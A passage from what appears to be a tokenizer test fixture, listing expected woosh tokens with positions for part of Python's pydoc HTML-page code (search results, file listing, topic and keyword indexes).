woosh.Token(woosh.INDENT, ' ', 2530, 0, 2530, 16),
woosh.Token(woosh.NAME, 'pass', 2530, 16, 2530, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 2530, 20, 2531, 0),
woosh.Token(woosh.DEDENT, ' ', 2531, 0, 2531, 12),
woosh.Token(woosh.NAME, 'ModuleScanner', 2531, 12, 2531, 25),
woosh.Token(woosh.OP, '(', 2531, 25, 2531, 26),
woosh.Token(woosh.OP, ')', 2531, 26, 2531, 27),
woosh.Token(woosh.OP, '.', 2531, 27, 2531, 28),
woosh.Token(woosh.NAME, 'run', 2531, 28, 2531, 31),
woosh.Token(woosh.OP, '(', 2531, 31, 2531, 32),
woosh.Token(woosh.NAME, 'callback', 2531, 32, 2531, 40),
woosh.Token(woosh.OP, ',', 2531, 40, 2531, 41),
woosh.Token(woosh.NAME, 'key', 2531, 42, 2531, 45),
woosh.Token(woosh.OP, ',', 2531, 45, 2531, 46),
woosh.Token(woosh.NAME, 'onerror', 2531, 47, 2531, 54),
woosh.Token(woosh.OP, '=', 2531, 54, 2531, 55),
woosh.Token(woosh.NAME, 'onerror', 2531, 55, 2531, 62),
woosh.Token(woosh.OP, ')', 2531, 62, 2531, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 2531, 63, 2532, 0),
woosh.Token(woosh.COMMENT, '# format page', 2533, 8, 2533, 21),
woosh.Token(woosh.DEDENT, ' ', 2534, 0, 2534, 8),
woosh.Token(woosh.NAME, 'def', 2534, 8, 2534, 11),
woosh.Token(woosh.NAME, 'bltinlink', 2534, 12, 2534, 21),
woosh.Token(woosh.OP, '(', 2534, 21, 2534, 22),
woosh.Token(woosh.NAME, 'name', 2534, 22, 2534, 26),
woosh.Token(woosh.OP, ')', 2534, 26, 2534, 27),
woosh.Token(woosh.OP, ':', 2534, 27, 2534, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2534, 28, 2535, 0),
woosh.Token(woosh.INDENT, ' ', 2535, 0, 2535, 12),
woosh.Token(woosh.NAME, 'return', 2535, 12, 2535, 18),
woosh.Token(woosh.STRING, '\'<a href="%s.html">%s</a>\'', 2535, 19, 2535, 45),
woosh.Token(woosh.OP, '%', 2535, 46, 2535, 47),
woosh.Token(woosh.OP, '(', 2535, 48, 2535, 49),
woosh.Token(woosh.NAME, 'name', 2535, 49, 2535, 53),
woosh.Token(woosh.OP, ',', 2535, 53, 2535, 54),
woosh.Token(woosh.NAME, 'name', 2535, 55, 2535, 59),
woosh.Token(woosh.OP, ')', 2535, 59, 2535, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 2535, 60, 2536, 0),
woosh.Token(woosh.DEDENT, ' ', 2537, 0, 2537, 8),
woosh.Token(woosh.NAME, 'results', 2537, 8, 2537, 15),
woosh.Token(woosh.OP, '=', 2537, 16, 2537, 17),
woosh.Token(woosh.OP, '[', 2537, 18, 2537, 19),
woosh.Token(woosh.OP, ']', 2537, 19, 2537, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 2537, 20, 2538, 0),
woosh.Token(woosh.NAME, 'heading', 2538, 8, 2538, 15),
woosh.Token(woosh.OP, '=', 2538, 16, 2538, 17),
woosh.Token(woosh.NAME, 'html', 2538, 18, 2538, 22),
woosh.Token(woosh.OP, '.', 2538, 22, 2538, 23),
woosh.Token(woosh.NAME, 'heading', 2538, 23, 2538, 30),
woosh.Token(woosh.OP, '(', 2538, 30, 2538, 31),
woosh.Token(woosh.STRING, "'<big><big><strong>Search Results</strong></big></big>'", 2539, 12, 2539, 67),
woosh.Token(woosh.OP, ',', 2539, 67, 2539, 68),
woosh.Token(woosh.STRING, "'#ffffff'", 2540, 12, 2540, 21),
woosh.Token(woosh.OP, ',', 2540, 21, 2540, 22),
woosh.Token(woosh.STRING, "'#7799ee'", 2540, 23, 2540, 32),
woosh.Token(woosh.OP, ')', 2540, 32, 2540, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2540, 33, 2541, 0),
woosh.Token(woosh.NAME, 'for', 2541, 8, 2541, 11),
woosh.Token(woosh.NAME, 'name', 2541, 12, 2541, 16),
woosh.Token(woosh.OP, ',', 2541, 16, 2541, 17),
woosh.Token(woosh.NAME, 'desc', 2541, 18, 2541, 22),
woosh.Token(woosh.NAME, 'in', 2541, 23, 2541, 25),
woosh.Token(woosh.NAME, 'search_result', 2541, 26, 2541, 39),
woosh.Token(woosh.OP, ':', 2541, 39, 2541, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 2541, 40, 2542, 0),
woosh.Token(woosh.INDENT, ' ', 2542, 0, 2542, 12),
woosh.Token(woosh.NAME, 'results', 2542, 12, 2542, 19),
woosh.Token(woosh.OP, '.', 2542, 19, 2542, 20),
woosh.Token(woosh.NAME, 'append', 2542, 20, 2542, 26),
woosh.Token(woosh.OP, '(', 2542, 26, 2542, 27),
woosh.Token(woosh.NAME, 'bltinlink', 2542, 27, 2542, 36),
woosh.Token(woosh.OP, '(', 2542, 36, 2542, 37),
woosh.Token(woosh.NAME, 'name', 2542, 37, 2542, 41),
woosh.Token(woosh.OP, ')', 2542, 41, 2542, 42),
woosh.Token(woosh.OP, '+', 2542, 43, 2542, 44),
woosh.Token(woosh.NAME, 'desc', 2542, 45, 2542, 49),
woosh.Token(woosh.OP, ')', 2542, 49, 2542, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 2542, 50, 2543, 0),
woosh.Token(woosh.DEDENT, ' ', 2543, 0, 2543, 8),
woosh.Token(woosh.NAME, 'contents', 2543, 8, 2543, 16),
woosh.Token(woosh.OP, '=', 2543, 17, 2543, 18),
woosh.Token(woosh.NAME, 'heading', 2543, 19, 2543, 26),
woosh.Token(woosh.OP, '+', 2543, 27, 2543, 28),
woosh.Token(woosh.NAME, 'html', 2543, 29, 2543, 33),
woosh.Token(woosh.OP, '.', 2543, 33, 2543, 34),
woosh.Token(woosh.NAME, 'bigsection', 2543, 34, 2543, 44),
woosh.Token(woosh.OP, '(', 2543, 44, 2543, 45),
woosh.Token(woosh.STRING, "'key = %s'", 2544, 12, 2544, 22),
woosh.Token(woosh.OP, '%', 2544, 23, 2544, 24),
woosh.Token(woosh.NAME, 'key', 2544, 25, 2544, 28),
woosh.Token(woosh.OP, ',', 2544, 28, 2544, 29),
woosh.Token(woosh.STRING, "'#ffffff'", 2544, 30, 2544, 39),
woosh.Token(woosh.OP, ',', 2544, 39, 2544, 40),
woosh.Token(woosh.STRING, "'#ee77aa'", 2544, 41, 2544, 50),
woosh.Token(woosh.OP, ',', 2544, 50, 2544, 51),
woosh.Token(woosh.STRING, "'<br>'", 2544, 52, 2544, 58),
woosh.Token(woosh.OP, '.', 2544, 58, 2544, 59),
woosh.Token(woosh.NAME, 'join', 2544, 59, 2544, 63),
woosh.Token(woosh.OP, '(', 2544, 63, 2544, 64),
woosh.Token(woosh.NAME, 'results', 2544, 64, 2544, 71),
woosh.Token(woosh.OP, ')', 2544, 71, 2544, 72),
woosh.Token(woosh.OP, ')', 2544, 72, 2544, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 2544, 73, 2545, 0),
woosh.Token(woosh.NAME, 'return', 2545, 8, 2545, 14),
woosh.Token(woosh.STRING, "'Search Results'", 2545, 15, 2545, 31),
woosh.Token(woosh.OP, ',', 2545, 31, 2545, 32),
woosh.Token(woosh.NAME, 'contents', 2545, 33, 2545, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2545, 41, 2546, 0),
woosh.Token(woosh.DEDENT, ' ', 2547, 0, 2547, 4),
woosh.Token(woosh.NAME, 'def', 2547, 4, 2547, 7),
woosh.Token(woosh.NAME, 'html_getfile', 2547, 8, 2547, 20),
woosh.Token(woosh.OP, '(', 2547, 20, 2547, 21),
woosh.Token(woosh.NAME, 'path', 2547, 21, 2547, 25),
woosh.Token(woosh.OP, ')', 2547, 25, 2547, 26),
woosh.Token(woosh.OP, ':', 2547, 26, 2547, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2547, 27, 2548, 0),
woosh.Token(woosh.INDENT, ' ', 2548, 0, 2548, 8),
woosh.Token(woosh.STRING, '"""Get and display a source file listing safely."""', 2548, 8, 2548, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 2548, 59, 2549, 0),
woosh.Token(woosh.NAME, 'path', 2549, 8, 2549, 12),
woosh.Token(woosh.OP, '=', 2549, 13, 2549, 14),
woosh.Token(woosh.NAME, 'urllib', 2549, 15, 2549, 21),
woosh.Token(woosh.OP, '.', 2549, 21, 2549, 22),
woosh.Token(woosh.NAME, 'parse', 2549, 22, 2549, 27),
woosh.Token(woosh.OP, '.', 2549, 27, 2549, 28),
woosh.Token(woosh.NAME, 'unquote', 2549, 28, 2549, 35),
woosh.Token(woosh.OP, '(', 2549, 35, 2549, 36),
woosh.Token(woosh.NAME, 'path', 2549, 36, 2549, 40),
woosh.Token(woosh.OP, ')', 2549, 40, 2549, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2549, 41, 2550, 0),
woosh.Token(woosh.NAME, 'with', 2550, 8, 2550, 12),
woosh.Token(woosh.NAME, 'tokenize', 2550, 13, 2550, 21),
woosh.Token(woosh.OP, '.', 2550, 21, 2550, 22),
woosh.Token(woosh.NAME, 'open', 2550, 22, 2550, 26),
woosh.Token(woosh.OP, '(', 2550, 26, 2550, 27),
woosh.Token(woosh.NAME, 'path', 2550, 27, 2550, 31),
woosh.Token(woosh.OP, ')', 2550, 31, 2550, 32),
woosh.Token(woosh.NAME, 'as', 2550, 33, 2550, 35),
woosh.Token(woosh.NAME, 'fp', 2550, 36, 2550, 38),
woosh.Token(woosh.OP, ':', 2550, 38, 2550, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2550, 39, 2551, 0),
woosh.Token(woosh.INDENT, ' ', 2551, 0, 2551, 12),
woosh.Token(woosh.NAME, 'lines', 2551, 12, 2551, 17),
woosh.Token(woosh.OP, '=', 2551, 18, 2551, 19),
woosh.Token(woosh.NAME, 'html', 2551, 20, 2551, 24),
woosh.Token(woosh.OP, '.', 2551, 24, 2551, 25),
woosh.Token(woosh.NAME, 'escape', 2551, 25, 2551, 31),
woosh.Token(woosh.OP, '(', 2551, 31, 2551, 32),
woosh.Token(woosh.NAME, 'fp', 2551, 32, 2551, 34),
woosh.Token(woosh.OP, '.', 2551, 34, 2551, 35),
woosh.Token(woosh.NAME, 'read', 2551, 35, 2551, 39),
woosh.Token(woosh.OP, '(', 2551, 39, 2551, 40),
woosh.Token(woosh.OP, ')', 2551, 40, 2551, 41),
woosh.Token(woosh.OP, ')', 2551, 41, 2551, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 2551, 42, 2552, 0),
woosh.Token(woosh.DEDENT, ' ', 2552, 0, 2552, 8),
woosh.Token(woosh.NAME, 'body', 2552, 8, 2552, 12),
woosh.Token(woosh.OP, '=', 2552, 13, 2552, 14),
woosh.Token(woosh.STRING, "'<pre>%s</pre>'", 2552, 15, 2552, 30),
woosh.Token(woosh.OP, '%', 2552, 31, 2552, 32),
woosh.Token(woosh.NAME, 'lines', 2552, 33, 2552, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 2552, 38, 2553, 0),
woosh.Token(woosh.NAME, 'heading', 2553, 8, 2553, 15),
woosh.Token(woosh.OP, '=', 2553, 16, 2553, 17),
woosh.Token(woosh.NAME, 'html', 2553, 18, 2553, 22),
woosh.Token(woosh.OP, '.', 2553, 22, 2553, 23),
woosh.Token(woosh.NAME, 'heading', 2553, 23, 2553, 30),
woosh.Token(woosh.OP, '(', 2553, 30, 2553, 31),
woosh.Token(woosh.STRING, "'<big><big><strong>File Listing</strong></big></big>'", 2554, 12, 2554, 65),
woosh.Token(woosh.OP, ',', 2554, 65, 2554, 66),
woosh.Token(woosh.STRING, "'#ffffff'", 2555, 12, 2555, 21),
woosh.Token(woosh.OP, ',', 2555, 21, 2555, 22),
woosh.Token(woosh.STRING, "'#7799ee'", 2555, 23, 2555, 32),
woosh.Token(woosh.OP, ')', 2555, 32, 2555, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2555, 33, 2556, 0),
woosh.Token(woosh.NAME, 'contents', 2556, 8, 2556, 16),
woosh.Token(woosh.OP, '=', 2556, 17, 2556, 18),
woosh.Token(woosh.NAME, 'heading', 2556, 19, 2556, 26),
woosh.Token(woosh.OP, '+', 2556, 27, 2556, 28),
woosh.Token(woosh.NAME, 'html', 2556, 29, 2556, 33),
woosh.Token(woosh.OP, '.', 2556, 33, 2556, 34),
woosh.Token(woosh.NAME, 'bigsection', 2556, 34, 2556, 44),
woosh.Token(woosh.OP, '(', 2556, 44, 2556, 45),
woosh.Token(woosh.STRING, "'File: %s'", 2557, 12, 2557, 22),
woosh.Token(woosh.OP, '%', 2557, 23, 2557, 24),
woosh.Token(woosh.NAME, 'path', 2557, 25, 2557, 29),
woosh.Token(woosh.OP, ',', 2557, 29, 2557, 30),
woosh.Token(woosh.STRING, "'#ffffff'", 2557, 31, 2557, 40),
woosh.Token(woosh.OP, ',', 2557, 40, 2557, 41),
woosh.Token(woosh.STRING, "'#ee77aa'", 2557, 42, 2557, 51),
woosh.Token(woosh.OP, ',', 2557, 51, 2557, 52),
woosh.Token(woosh.NAME, 'body', 2557, 53, 2557, 57),
woosh.Token(woosh.OP, ')', 2557, 57, 2557, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 2557, 58, 2558, 0),
woosh.Token(woosh.NAME, 'return', 2558, 8, 2558, 14),
woosh.Token(woosh.STRING, "'getfile %s'", 2558, 15, 2558, 27),
woosh.Token(woosh.OP, '%', 2558, 28, 2558, 29),
woosh.Token(woosh.NAME, 'path', 2558, 30, 2558, 34),
woosh.Token(woosh.OP, ',', 2558, 34, 2558, 35),
woosh.Token(woosh.NAME, 'contents', 2558, 36, 2558, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 2558, 44, 2559, 0),
woosh.Token(woosh.DEDENT, ' ', 2560, 0, 2560, 4),
woosh.Token(woosh.NAME, 'def', 2560, 4, 2560, 7),
woosh.Token(woosh.NAME, 'html_topics', 2560, 8, 2560, 19),
woosh.Token(woosh.OP, '(', 2560, 19, 2560, 20),
woosh.Token(woosh.OP, ')', 2560, 20, 2560, 21),
woosh.Token(woosh.OP, ':', 2560, 21, 2560, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 2560, 22, 2561, 0),
woosh.Token(woosh.INDENT, ' ', 2561, 0, 2561, 8),
woosh.Token(woosh.STRING, '"""Index of topic texts available."""', 2561, 8, 2561, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 2561, 45, 2562, 0),
woosh.Token(woosh.NAME, 'def', 2563, 8, 2563, 11),
woosh.Token(woosh.NAME, 'bltinlink', 2563, 12, 2563, 21),
woosh.Token(woosh.OP, '(', 2563, 21, 2563, 22),
woosh.Token(woosh.NAME, 'name', 2563, 22, 2563, 26),
woosh.Token(woosh.OP, ')', 2563, 26, 2563, 27),
woosh.Token(woosh.OP, ':', 2563, 27, 2563, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2563, 28, 2564, 0),
woosh.Token(woosh.INDENT, ' ', 2564, 0, 2564, 12),
woosh.Token(woosh.NAME, 'return', 2564, 12, 2564, 18),
woosh.Token(woosh.STRING, '\'<a href="topic?key=%s">%s</a>\'', 2564, 19, 2564, 50),
woosh.Token(woosh.OP, '%', 2564, 51, 2564, 52),
woosh.Token(woosh.OP, '(', 2564, 53, 2564, 54),
woosh.Token(woosh.NAME, 'name', 2564, 54, 2564, 58),
woosh.Token(woosh.OP, ',', 2564, 58, 2564, 59),
woosh.Token(woosh.NAME, 'name', 2564, 60, 2564, 64),
woosh.Token(woosh.OP, ')', 2564, 64, 2564, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 2564, 65, 2565, 0),
woosh.Token(woosh.DEDENT, ' ', 2566, 0, 2566, 8),
woosh.Token(woosh.NAME, 'heading', 2566, 8, 2566, 15),
woosh.Token(woosh.OP, '=', 2566, 16, 2566, 17),
woosh.Token(woosh.NAME, 'html', 2566, 18, 2566, 22),
woosh.Token(woosh.OP, '.', 2566, 22, 2566, 23),
woosh.Token(woosh.NAME, 'heading', 2566, 23, 2566, 30),
woosh.Token(woosh.OP, '(', 2566, 30, 2566, 31),
woosh.Token(woosh.STRING, "'<big><big><strong>INDEX</strong></big></big>'", 2567, 12, 2567, 58),
woosh.Token(woosh.OP, ',', 2567, 58, 2567, 59),
woosh.Token(woosh.STRING, "'#ffffff'", 2568, 12, 2568, 21),
woosh.Token(woosh.OP, ',', 2568, 21, 2568, 22),
woosh.Token(woosh.STRING, "'#7799ee'", 2568, 23, 2568, 32),
woosh.Token(woosh.OP, ')', 2568, 32, 2568, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2568, 33, 2569, 0),
woosh.Token(woosh.NAME, 'names', 2569, 8, 2569, 13),
woosh.Token(woosh.OP, '=', 2569, 14, 2569, 15),
woosh.Token(woosh.NAME, 'sorted', 2569, 16, 2569, 22),
woosh.Token(woosh.OP, '(', 2569, 22, 2569, 23),
woosh.Token(woosh.NAME, 'Helper', 2569, 23, 2569, 29),
woosh.Token(woosh.OP, '.', 2569, 29, 2569, 30),
woosh.Token(woosh.NAME, 'topics', 2569, 30, 2569, 36),
woosh.Token(woosh.OP, '.', 2569, 36, 2569, 37),
woosh.Token(woosh.NAME, 'keys', 2569, 37, 2569, 41),
woosh.Token(woosh.OP, '(', 2569, 41, 2569, 42),
woosh.Token(woosh.OP, ')', 2569, 42, 2569, 43),
woosh.Token(woosh.OP, ')', 2569, 43, 2569, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 2569, 44, 2570, 0),
woosh.Token(woosh.NAME, 'contents', 2571, 8, 2571, 16),
woosh.Token(woosh.OP, '=', 2571, 17, 2571, 18),
woosh.Token(woosh.NAME, 'html', 2571, 19, 2571, 23),
woosh.Token(woosh.OP, '.', 2571, 23, 2571, 24),
woosh.Token(woosh.NAME, 'multicolumn', 2571, 24, 2571, 35),
woosh.Token(woosh.OP, '(', 2571, 35, 2571, 36),
woosh.Token(woosh.NAME, 'names', 2571, 36, 2571, 41),
woosh.Token(woosh.OP, ',', 2571, 41, 2571, 42),
woosh.Token(woosh.NAME, 'bltinlink', 2571, 43, 2571, 52),
woosh.Token(woosh.OP, ')', 2571, 52, 2571, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2571, 53, 2572, 0),
woosh.Token(woosh.NAME, 'contents', 2572, 8, 2572, 16),
woosh.Token(woosh.OP, '=', 2572, 17, 2572, 18),
woosh.Token(woosh.NAME, 'heading', 2572, 19, 2572, 26),
woosh.Token(woosh.OP, '+', 2572, 27, 2572, 28),
woosh.Token(woosh.NAME, 'html', 2572, 29, 2572, 33),
woosh.Token(woosh.OP, '.', 2572, 33, 2572, 34),
woosh.Token(woosh.NAME, 'bigsection', 2572, 34, 2572, 44),
woosh.Token(woosh.OP, '(', 2572, 44, 2572, 45),
woosh.Token(woosh.STRING, "'Topics'", 2573, 12, 2573, 20),
woosh.Token(woosh.OP, ',', 2573, 20, 2573, 21),
woosh.Token(woosh.STRING, "'#ffffff'", 2573, 22, 2573, 31),
woosh.Token(woosh.OP, ',', 2573, 31, 2573, 32),
woosh.Token(woosh.STRING, "'#ee77aa'", 2573, 33, 2573, 42),
woosh.Token(woosh.OP, ',', 2573, 42, 2573, 43),
woosh.Token(woosh.NAME, 'contents', 2573, 44, 2573, 52),
woosh.Token(woosh.OP, ')', 2573, 52, 2573, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2573, 53, 2574, 0),
woosh.Token(woosh.NAME, 'return', 2574, 8, 2574, 14),
woosh.Token(woosh.STRING, "'Topics'", 2574, 15, 2574, 23),
woosh.Token(woosh.OP, ',', 2574, 23, 2574, 24),
woosh.Token(woosh.NAME, 'contents', 2574, 25, 2574, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2574, 33, 2575, 0),
woosh.Token(woosh.DEDENT, ' ', 2576, 0, 2576, 4),
woosh.Token(woosh.NAME, 'def', 2576, 4, 2576, 7),
woosh.Token(woosh.NAME, 'html_keywords', 2576, 8, 2576, 21),
woosh.Token(woosh.OP, '(', 2576, 21, 2576, 22),
woosh.Token(woosh.OP, ')', 2576, 22, 2576, 23),
woosh.Token(woosh.OP, ':', 2576, 23, 2576, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 2576, 24, 2577, 0),
woosh.Token(woosh.INDENT, ' ', 2577, 0, 2577, 8),
woosh.Token(woosh.STRING, '"""Index of keywords."""', 2577, 8, 2577, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2577, 32, 2578, 0),
woosh.Token(woosh.NAME, 'heading', 2578, 8, 2578, 15),
woosh.Token(woosh.OP, '=', 2578, 16, 2578, 17),
woosh.Token(woosh.NAME, 'html', 2578, 18, 2578, 22),
woosh.Token(woosh.OP, '.', 2578, 22, 2578, 23),
woosh.Token(woosh.NAME, 'heading', 2578, 23, 2578, 30),
woosh.Token(woosh.OP, '(', 2578, 30, 2578, 31),
woosh.Token(woosh.STRING, "'<big><big><strong>INDEX</strong></big></big>'", 2579, 12, 2579, 58),
woosh.Token(woosh.OP, ',', 2579, 58, 2579, 59),
woosh.Token(woosh.STRING, "'#ffffff'", 2580, 12, 2580, 21),
woosh.Token(woosh.OP, ',', 2580, 21, 2580, 22),
woosh.Token(woosh.STRING, "'#7799ee'", 2580, 23, 2580, 32),
woosh.Token(woosh.OP, ')', 2580, 32, 2580, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2580, 33, 2581, 0),
woosh.Token(woosh.NAME, 'names', 2581, 8, 2581, 13),
woosh.Token(woosh.OP, '=', 2581, 14, 2581, 15),
woosh.Token(woosh.NAME, 'sorted', 2581, 16, 2581, 22),
woosh.Token(woosh.OP, '(', 2581, 22, 2581, 23),
woosh.Token(woosh.NAME, 'Helper', 2581, 23, 2581, 29),
woosh.Token(woosh.OP, '.', 2581, 29, 2581, 30),
woosh.Token(woosh.NAME, 'keywords', 2581, 30, 2581, 38),
woosh.Token(woosh.OP, '.', 2581, 38, 2581, 39),
woosh.Token(woosh.NAME, 'keys', 2581, 39, 2581, 43),
woosh.Token(woosh.OP, '(', 2581, 43, 2581, 44),
woosh.Token(woosh.OP, ')', 2581, 44, 2581, 45),
woosh.Token(woosh.OP, ')', 2581, 45, 2581, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 2581, 46, 2582, 0),
woosh.Token(woosh.NAME, 'def', 2583, 8, 2583, 11),
woosh.Token(woosh.NAME, 'bltinlink', 2583, 12, 2583, 21),
woosh.Token(woosh.OP, '(', 2583, 21, 2583, 22),
woosh.Token(woosh.NAME, 'name', 2583, 22, 2583, 26),
woosh.Token(woosh.OP, ')', 2583, 26, 2583, 27),
woosh.Token(woosh.OP, ':', 2583, 27, 2583, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2583, 28, 2584, 0),
woosh.Token(woosh.INDENT, ' ', 2584, 0, 2584, 12),
woosh.Token(woosh.NAME, 'return', 2584, 12, 2584, 18),
woosh.Token(woosh.STRING, '\'<a href="topic?key=%s">%s</a>\'', 2584, 19, 2584, 50),
woosh.Token(woosh.OP, '%', 2584, 51, 2584, 52),
woosh.Token(woosh.OP, '(', 2584, 53, 2584, 54),
woosh.Token(woosh.NAME, 'name', 2584, 54, 2584, 58),
woosh.Token(woosh.OP, ',', 2584, 58, 2584, 59),
woosh.Token(woosh.NAME, 'name', 2584, 60, 2584, 64),
woosh.Token(woosh.OP, ')', 2584, 64, 2584, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 2584, 65, 2585, 0),
woosh.Token(woosh.DEDENT, ' ', 2586, 0, 2586, 8),
woosh.Token(woosh.NAME, 'contents', 2586, 8, 2586, 16),
woosh.Token(woosh.OP, '=', 2586, 17, 2586, 18),
woosh.Token(woosh.NAME, 'html', 2586, 19, 2586, 23),
woosh.Token(woosh.OP, '.', 2586, 23, 2586, 24),
woosh.Token(woosh.NAME, 'multicolumn', 2586, 24, 2586, 35),
woosh.Token(woosh.OP, '(', 2586, 35, 2586, 36),
woosh.Token(woosh.NAME, 'names', 2586, 36, 2586, 41),
woosh.Token(woosh.OP, ',', 2586, 41, 2586, 42),
woosh.Token(woosh.NAME, 'bltinlink', 2586, 43, 2586, 52),
woosh.Token(woosh.OP, ')', 2586, 52, 2586, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2586, 53, 2587, 0),
woosh.Token(woosh.NAME, 'contents', 2587, 8, 2587, 16),
woosh.Token(woosh.OP, '=', 2587, 17, 2587, 18),
woosh.Token(woosh.NAME, 'heading', 2587, 19, 2587, 26),
woosh.Token(woosh.OP, '+', 2587, 27, 2587, 28),
woosh.Token(woosh.NAME, 'html', 2587, 29, 2587, 33),
woosh.Token(woosh.OP, '.', 2587, 33, 2587, 34),
woosh.Token(woosh.NAME, 'bigsection', 2587, 34, 2587, 44),
woosh.Token(woosh.OP, '(', 2587, 44, 2587, 45),
woosh.Token(woosh.STRING, "'Keywords'", 2588, 12, 2588, 22),
woosh.Token(woosh.OP, ',', 2588, 22, 2588, 23),
woosh.Token(woosh.STRING, "'#ffffff'", 2588, 24, 2588, 33),
woosh.Token(woosh.OP, ',', 2588, 33, 2588, 34),
woosh.Token(woosh.STRING, "'#ee77aa'", 2588, 35, 2588, 44),
woosh.Token(woosh.OP, ',', 2588, 44, 2588, 45),
woosh.Token(woosh.NAME, 'contents', 2588, 46, 2588, 54),
woosh.Token(woosh.OP, ')', 2588, 54, 2588, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 2588, 55, 2589, 0),
woosh.Token(woosh.NAME, 'return', 2589, 8, 2589, 14),
woosh.Token(woosh.STRING, "'Keywords'", 2589, 15, 2589, 25),
woosh.Token(woosh.OP, ',', 2589, 25, 2589, 26),
woosh.Token(woosh.NAME, 'contents', 2589, 27, 2589, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2589, 35, 2590, 0),
woosh.Token(woosh.DEDENT, ' ', 2591, 0, 2591, 4),
woosh.Token(woosh.NAME, 'def', 2591, 4, 2591, 7),
woosh.Token(woosh.NAME, 'html_topicpage', 2591, 8, 2591, 22),
woosh.Token(woosh.OP, '(', 2591, 22, 2591, 23),
woosh.Token(woosh.NAME, 'topic', 2591, 23, 2591, 28),
woosh.Token(woosh.OP, ')', 2591, 28, 2591, 29),
woosh.Token(woosh.OP, ':', 2591, 29, 2591, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 2591, 30, 2592, 0),
woosh.Token(woosh.INDENT, ' ', 2592, 0, 2592, 8),
woosh.Token(woosh.STRING, '"""Topic or keyword help page."""', 2592, 8, 2592, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2592, 41, 2593, 0),
woosh.Token(woosh.NAME, 'buf', 2593, 8, 2593, 11),
woosh.Token(woosh.OP, '=', 2593, 12, 2593, 13),
woosh.Token(woosh.NAME, 'io', 2593, 14, 2593, 16),
woosh.Token(woosh.OP, '.', 2593, 16, 2593, 17),
woosh.Token(woosh.NAME, 'StringIO', 2593, 17, 2593, 25),
woosh.Token(woosh.OP, '(', 2593, 25, 2593, 26),
woosh.Token(woosh.OP, ')', 2593, 26, 2593, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2593, 27, 2594, 0),
woosh.Token(woosh.NAME, 'htmlhelp', 2594, 8, 2594, 16),
woosh.Token(woosh.OP, '=', 2594, 17, 2594, 18),
woosh.Token(woosh.NAME, 'Helper', 2594, 19, 2594, 25),
woosh.Token(woosh.OP, '(', 2594, 25, 2594, 26),
woosh.Token(woosh.NAME, 'buf', 2594, 26, 2594, 29),
woosh.Token(woosh.OP, ',', 2594, 29, 2594, 30),
woosh.Token(woosh.NAME, 'buf', 2594, 31, 2594, 34),
woosh.Token(woosh.OP, ')', 2594, 34, 2594, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2594, 35, 2595, 0),
woosh.Token(woosh.NAME, 'contents', 2595, 8, 2595, 16),
woosh.Token(woosh.OP, ',', 2595, 16, 2595, 17),
woosh.Token(woosh.NAME, 'xrefs', 2595, 18, 2595, 23),
woosh.Token(woosh.OP, '=', 2595, 24, 2595, 25),
woosh.Token(woosh.NAME, 'htmlhelp', 2595, 26, 2595, 34),
woosh.Token(woosh.OP, '.', 2595, 34, 2595, 35),
woosh.Token(woosh.NAME, '_gettopic', 2595, 35, 2595, 44),
woosh.Token(woosh.OP, '(', 2595, 44, 2595, 45),
woosh.Token(woosh.NAME, 'topic', 2595, 45, 2595, 50),
woosh.Token(woosh.OP, ')', 2595, 50, 2595, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 2595, 51, 2596, 0),
woosh.Token(woosh.NAME, 'if', 2596, 8, 2596, 10),
woosh.Token(woosh.NAME, 'topic', 2596, 11, 2596, 16),
woosh.Token(woosh.NAME, 'in', 2596, 17, 2596, 19),
woosh.Token(woosh.NAME, 'htmlhelp', 2596, 20, 2596, 28),
woosh.Token(woosh.OP, '.', 2596, 28, 2596, 29),
woosh.Token(woosh.NAME, 'keywords', 2596, 29, 2596, 37),
woosh.Token(woosh.OP, ':', 2596, 37, 2596, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 2596, 38, 2597, 0),
woosh.Token(woosh.INDENT, ' ', 2597, 0, 2597, 12),
woosh.Token(woosh.NAME, 'title', 2597, 12, 2597, 17),
woosh.Token(woosh.OP, '=', 2597, 18, 2597, 19),
woosh.Token(woosh.STRING, "'KEYWORD'", 2597, 20, 2597, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 2597, 29, 2598, 0),
woosh.Token(woosh.DEDENT, ' ', 2598, 0, 2598, 8),
woosh.Token(woosh.NAME, 'else', 2598, 8, 2598, 12),
woosh.Token(woosh.OP, ':', 2598, 12, 2598, 13),
